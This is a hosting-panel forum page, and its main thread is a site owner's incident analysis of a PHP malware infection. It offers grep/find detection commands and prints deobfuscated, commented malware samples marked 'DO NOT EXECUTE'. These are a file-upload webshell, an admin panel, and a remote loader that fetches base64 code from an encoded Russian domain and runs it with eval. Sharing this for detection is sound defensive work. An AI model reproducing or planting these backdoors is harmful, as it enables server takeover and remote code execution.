Recent Posts

Pages: 1 [2] 3 4 ... 10
11
DKIM / Re: I'm a bit lost
« Last post by pedromidiasf on Today at 12:48:10 PM »
I'm sorry I lost this message.
Thank you for your time and help.
12
Information / Re: htpasswd on CWP
« Last post by pedromidiasf on Today at 10:02:46 AM »
The FYI for those interested is that cwpsrv runs under Nginx, not Apache -- so syntax for configuration changes needs to be appropriate for Nginx. And thus, .htaccess files are not read or considered.

Also, in order to preserve files through CWP updates, you need to set the immutable bit:
Code: [Select]
chattr +i /usr/local/cwpsrv/htdocs/.htpasswd
Yes I fould out. I wasn't familier with Nginx, that's why it wasn't working what I was doing.
Thanks for the immutable bit! This will help!
13
To find files that have base64 encoded parts (used to obfuscate php code):
grep -RIl --binary-files=text -P '[A-Za-z0-9+/]{100,}={0,2}' /home

Some false positives might end up being: pdf, mp3, image, and so on (you have to take a deep look into it)

--
Alternative:

If you want to filter just php files (not enough to be secure):
grep -RIl --binary-files=text --include="*.php" -P '[A-Za-z0-9+/]{100,}={0,2}' /home

If you want to filter just files without extension (still not enough to be secure):
grep -RIl --binary-files=text --exclude='*.*' -P '[A-Za-z0-9+/]{100,}={0,2}' /home

--
Note: You could extend this outside /home. But as far I'm concern, this hack didn't directly affect the system otherwise you would be seeing cron jobs and other stuff around the system. But I recommend you to change all usernames passwords.
14
There are a lot of index.php files exploited. Some are close to "c" file, others are just disposed across directories.
Use this to find them:
grep -Rl --include="*index.php" 'ucwords' /home/px_disabled/public_html/


To find zipped files that have no zip extension (ignoring Microsoft Office documents):
find /home -type f ! -name '*.zip' ! -name '*.docx' ! -name '*.xlsx' ! -name '*.pptx' -exec sh -c 'head -c2 "$1" | read -r b && [ "$b" = "PK" ] && echo "$1"' _ {} \;
15
Also found out that all the files you get distributed by the server are obfuscated differently. By this you won't be able to search for specific text. Maybe specific functions but even the functions like "goto", "ucwords" and $GLOBALS that is not commonly used but it is used a lot on these exploits.

$GLOBALS array is used to add a function (built with a string??) to the system that is afterwards executed. This allows the attacker to execute php code without using the "eval" function (I'm not sure about this part). This therm is used on all files that i saw, it might be very useful to find those exploits using this term.


Another idea:
Also search for files that start with "PK" (zipped content) and don't have the zip extension.
16
wp-login.php
It receives an URL GET parameter (?MeL=...) that is related to that "licelic.c" code inside (all URLs there have this MeL parameter). It also saves files.

(DO NOT EXECUTE THIS!)
Code: [Select]
<?php 
// WARNING: MALICIOUS CODE - DO NOT EXECUTE

// Initialize variables
$aLTZ_CWiB false;

// Decode &#39;serialize&#39; function from concatenated string indices
// This reconstructs: s-e-r-i-a-l-i-z-e
$dseBk = (("IsSw6u")[1].("ptB7")[1].("Pa4rn")[3].("Rs87W1")[1].("nntWNs")[2].
(
"vgIrrw")[3])("dseBk""GjGg9m");

$b4YsfJ = array("o0FgLZyK4ABbJHto");
$JHwES = (string) null;

// Decode &#39;wordwrap&#39; function and set word wrap to 15 characters
$aVcFqS = (("vrgwA7")[3].("kozN")[1].("wr2Hs")[1].("dQSktI")[0].
(
"wbrHMj")[0].("v8SZrf")[4].("cuEaA")[3].("poCzK")[0])(""15);

// Get current date and time
$EKsO2FVW date("Y-m-d H:i:s");

// Decode &#39;md5&#39; function
$MAsW_z = (("IsSw6u")[1].("ptB7")[1].("Pa4rn")[3].("Rs87W1")[1].
(
"nntWNs")[2].("vgIrrw")[3])("MAsW_z""cGXdJI");

// Decode &#39;trim&#39; function
$zs7o1QeOh = (("U35tN")[3].("rdb9a")[0].("limY_R")[1].("ZIcamw")[4])("   ");

// Check if GET parameter "MeL" exists - if not, exit
if(!isset($_GET["MeL"])) exit;

// Check if constant is defined
$LHpbN4P2x defined("_NYaHD");

// Get POST parameter "RfDJgIyWki" (trim it if exists)
$NiXTY2V3mC = isset($_POST["RfDJgIyWki"])?
((
"U35tN")[3].("rdb9a")[0].("limY_R")[1].("ZIcamw")[4])($_POST["RfDJgIyWki"]):"";

$_blZ7fx metaphone("moSCud");
$Jt69Gsohg define("OL0mQ","gDrORyX");
$BMbxgE4 false;

// Get POST parameter "xYjdx" (trim it if exists)
$V9Aqud = isset($_POST["xYjdx"])?
((
"U35tN")[3].("rdb9a")[0].("limY_R")[1].("ZIcamw")[4])($_POST["xYjdx"]):"";

// If $V9Aqud is not empty, call save_file() function and exit
// This SAVES UPLOADED FILE to the server
$sf = !empty($V9Aqud)?exit("hHc1Pq7UymG5xrZgRn_".save_file($NiXTY2V3mC,$V9Aqud)):"";

// Decode another function
$dPE1i_ = (("IsSw6u")[1].("ptB7")[1].("Pa4rn")[3].("Rs87W1")[1].
(
"nntWNs")[2].("vgIrrw")[3])("zOEPQxj","ssMKu");

// CRITICAL FUNCTION: Saves uploaded file to disk
// Parameters: $NiXTY2V3mC = filename, $V9Aqud = file content
function save_file($NiXTY2V3mC,$V9Aqud){
    
// Open file in write mode
    
$handle fopen($NiXTY2V3mC,"w");
    if(
$handle){
        
// Write the malicious content to the file
        
fwrite($handle,$V9Aqud);
        
fclose($handle);
    }

    return 
"hHc1Pq7UymG5xrZgRn_";
}

$yXQwOmu addslashes("yXQwOmu");

// Display HTML form (reconstructed from character indices)
// This renders an HTML form with input fields
echo ("<z01")[0].("em8fuW")[3].(... [reconstructs HTML form HTML] ...);
?>
17
backup.c
Zip file (change the extension to zip and open it with a zip application). It contains a new file called "back".
This file talks to the exterior. I asked cloud.ai to comment the code:
(DO NOT EXECUTE)
Code: [Select]
<?php
// MALICIOUS CODE - DO NOT EXECUTE

// Helper function that executes a function dynamically
// Used to obfuscate function calls
function sdcss($strrt,$pram_1){
return $strrt($pram_1);
}

// Main malicious function that fetches and executes remote code
// Parameters: $url = remote server URL, $time_out = connection timeout
function KmY7I3NC($url,$time_out=30){
// Check if cURL is available (preferred method)
if(sdcss("function_exists","curl_exec")){
// Initialize cURL connection
$fq8h2HYxV=curl_init();

// Set the target URL (10002 = CURLOPT_URL)
curl_setopt($fq8h2HYxV,10002,$url);

// Return transfer as string (19913 = CURLOPT_RETURNTRANSFER)
curl_setopt($fq8h2HYxV,19913,1);

// Do not verify SSL certificate (64 = CURLOPT_SSL_VERIFYPEER)
curl_setopt($fq8h2HYxV,64,false);

// Set random timeout between 30-60 seconds (13 = CURLOPT_TIMEOUT)
curl_setopt($fq8h2HYxV,13,mt_rand(30,60));

// Execute the request, decode the response (skip first character)
// and execute it as PHP code using eval()
$fhD2dN4z = evAl(base64_decode(substr(trim(curl_exec($fq8h2HYxV)),1)));

// Close cURL connection
curl_close($fq8h2HYxV);
}else{
// Fallback: use file_get_contents if cURL is not available
// Also decodes base64 and executes with eval()
$fhD2dN4z = evAl(base64_decode(substr(trim(sdcss("file_get_contents",$url),1))));
}

// Return the result of executed code
return $fhD2dN4z;
}

// Main malware trigger - checks if GET parameter "l" is set
if(isset($_GET["l"])){
    // Collect all GET parameters (with empty string as default if not set)
    $tid = isset($_GET["tid"])?$_GET["tid"]:"";
    $did = isset($_GET["did"])?$_GET["did"]:"";
    $tem = isset($_GET["tem"])?$_GET["tem"]:"";
$ck = isset($_GET["ck"])?$_GET["ck"]:"";
$usip = isset($_GET["usip"])?$_GET["usip"]:"";
$vson = isset($_GET["vson"])?$_GET["vson"]:"";
$no = isset($_GET["no"])?$_GET["no"]:"";
    
    // Build malicious URL with encoded server address
    // URL decodes to: "http://vOlOVmARTc.Ru/dai/?c=base&l=...&ck=...&usip=...&vson=...&no=...&tid=...&did=...&tem=..."
    $url "\150\164\124\160\x3a\x2f\x2f\x76\x4f\x6c\117\x56\x6d\101\x52\124\x2e\122\165\57\x64\141\151\x2f\x3f\x63\75\142\141\x73\145\46\x6c\x3d".$_GET["l"]."&ck=".$ck."&usip=".$usip."&vson=".$vson."&no=".$no."&tid=".$tid."&did=".$did."&tem=".$tem;
    
    // Fetch remote PHP code, decode it, and execute it
    $str KmY7I3NC($url);
}

?>

Russian URLs (I've also detected some Russian emails on my Wordpress accounts.
But it looks like the domain is off. Probably banned?
18
I found some .c files.
I also found that there a lot of files called index.php, wp-login.php and files just called "c" (without the dot) across my websites. These files were deeply inside some folders of websites I've developed myself. Thankfully I have a clean backup and these files were not there.

licelic.c
I've decoded a "licelic.c" file and it had listed a lot of the infected websites locations encoded in base64 and some weird stuff (can't decode it directly, maybe it is written with another encode type). I copy-pasted it to Cloud.ai that decode it for me and it gave me all the urls that are infected. I tried chatgpt and it gave me nothing in return.
SO "licelic.c" is of extreme importance for you to deobfuscate and evaluate the URLs that are there. This file exposes the folders that were exploited.

Some of its contents:
Non wordpress website:
[my public url]/folder/folder/folder/index.php?MeL=1#####post_1
[my public url]/folder/folder/folder/index.php?MeL=1#####post_2
[my public url]/folder/folder/folder/index.php?MeL=1#####post_3
[my public url]/folder/folder/folder/index.php?MeL=1#####post_4
[my public url]/folder/folder/folder/index.php?MeL=1#####post_5
[my public url]/folder/folder/folder/index.php?MeL=1#####post_6
[my public url]/folder/folder/folder/index.php?MeL=1#####post_7
[my public url]/folder/folder/folder/index.php?MeL=1#####post_8
...

wordpress website:
[my public url]/folder/folder/folder/index.php/wp-login.php?Ny6u=2&adj=shop.php#saverun
[my public url]/folder/folder/folder/index.php/index.php?Ny6u=2&adj=shop.php#saverun
[my public url]/folder/folder/folder/index.php/index.php?Ny6u=2&adj=shop.php#saverun
[my public url]/folder/folder/folder/index.php/index.php?Ny6u=2&adj=shop.php#saverun

"c" file (without the dot)
"c" file (without the dot) is a zip content. You can add ".zip" to this file to open it with a zip application. Inside you get a new file that has a file called "s" that contains obfuscated php code that consists on drawing a form that probably interacts with the expoits. Maybe this is an exploit panel.
I leave the code here
(DO NOT EXECUTE THIS!!!!)
Code: [Select]
<?php
// WARNING: This is MALICIOUS code - DO NOT EXECUTE

// Checks if GET parameter "DEQ" exists
if(!isset($_GET["DEQ"])) exit;

// Function that decodes strings using indices
function Za64HUq_($TYCMzwTO$x6Mpbe) {
    
$iGRCOPT str_split($TYCMzwTO1);
    
$emivt51O explode(","$x6Mpbe);
    
$gMRtx3VD "";
    foreach(
$emivt51O as $v) {
        
$gMRtx3VD .= $iGRCOPT[(int)$v];
    }
    return 
$gMRtx3VD;
}

// Static class with method to initialize arrays
class hCXKOZB {
    public static function 
__callStatic($name$arguments) {
        
$temarr = array(
            
"puTfPFm" => array("3eolcnOp5Qf4_GqphVna1eerd2""10,2,7,1,5"),
            
"CULPcX" => array("eheriQctavFofpceulrwEpy_J5rG""12,19,3,4,7,0"),
            
"mWHO_PtG" => array("arsWrD_pcldbIoeelvh8uae4fc_K""24,8,9,13,2,14")
        );
        foreach(
$temarr as $key => $v) {
            
$GLOBALS[$key] = Za64HUq_($v[0], $v[1]);
        }
    }
}

// Gets values from POST (if they exist)
$vA8r0 = isset($_POST["WOjVxhQ_"]) ? trim($_POST["WOjVxhQ_"]) : "";
$oTlM_Lm47 = isset($_POST["ZXk7oVxn"]) ? trim($_POST["ZXk7oVxn"]) : "";

// Decodes the input
$n3Bi8fy = !empty($oTlM_Lm47) ? $puTfPFm($vA8r0"w") : "";

// If there is a decoded result, writes error message and exits
if($n3Bi8fy) exit("pIUeNv1Ox74Cq0i" $mWHO_PtG($n3Bi8fy));

// Displays HTML form with hidden fields
echo "<form method=\"POST\">";
echo 
"<div><input type=\"text\" name=\"WOjVxhQ_\"></div>";
echo 
"<div><textarea name=\"ZXk7oVxn\" rows=\"5\"></textarea></div>";
echo 
"<button type=\"submit\">submit</button>";
echo 
"</form>";
?>

index.php
This is the index.php deeply inside subfolders were the index file i've created. The root index.php file was replaced by a malicious code that executes the payload and imports my original index file.
So take a deep look on every index file you have (even sub-folders).

These files were touched (date-time changed). Mine dated 30/08/2024 23:06:51

So even if you change your panel or format your server, you'll be hacked again if you don't sanitize every website. This means going throw all files and folders and apply new rules to stop execution on folders that you don't have php files (image uploads for example).
19
What is the content of the .c file?

But yes, is related with the attack also.
The file contains a Base64 encrypted code, that do many changes in PHP files related with wordpress - theme and plugins.
20
Yes but having a cPanel/WHM is kinda expensive to have it online. I would rather configure a server by myself.
The things you mostly do usually don't require a web panel.
Are you sure this .c files are from this attack or from another one? I searched and didn't find such malicious files.
Pages: 1 [2] 3 4 ... 10